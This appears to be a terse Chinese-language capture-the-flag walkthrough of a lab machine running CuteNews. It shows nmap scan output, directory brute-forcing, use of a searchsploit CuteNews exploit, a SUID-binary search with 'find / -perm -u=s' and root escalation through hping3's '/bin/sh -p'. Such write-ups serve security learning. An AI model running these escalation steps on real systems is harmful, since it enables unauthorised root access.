kali:192.168.111.111
靶机:192.168.111.147
端口扫描
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 04d06ec4ba4a315a6fb3eeb81bed5ab7 (RSA)
| 256 24b3df010bcac2ab2ee949b058086afa (ECDSA)
|_ 256 6ac4356a7a1e7e51855b815c7c744984 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-favicon: Unknown favicon MD5: 759585A56089DB516D1FBBBE5A8EEA57
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp open http nginx 1.14.2
|_http-title: 404 Not Found
|_http-server-header: nginx/1.14.2
110/tcp open pop3 Courier pop3d
|_pop3-capabilities: UTF8(USER) STLS IMPLEMENTATION(Courier Mail Server) UIDL PIPELINING USER TOP LOGIN-DELAY(10)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-17T16:28:06
| Not valid after: 2021-09-17T16:28:06
| MD5: 5ee240c866d1b32771e6085af50b7e28
|_SHA-1: 28a3acc086a7cd648f0978fa179270320eccb154
995/tcp open ssl/pop3 Courier pop3d
|_pop3-capabilities: UTF8(USER) IMPLEMENTATION(Courier Mail Server) UIDL PIPELINING USER TOP LOGIN-DELAY(10)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-17T16:28:06
| Not valid after: 2021-09-17T16:28:06
| MD5: 5ee240c866d1b32771e6085af50b7e28
|_SHA-1: 28a3acc086a7cd648f0978fa179270320eccb154
目录爆破
访问web
README.md发现该cms版本
searchsploit搜索该cms漏洞
删除所有/CuteNews路径
执行该python脚本
find / -perm -u=s 2> /dev/null
提权https://gtfobins.github.io/gtfobins/hping3/#suid
/usr/sbin/hping3
/bin/sh -p
获得flag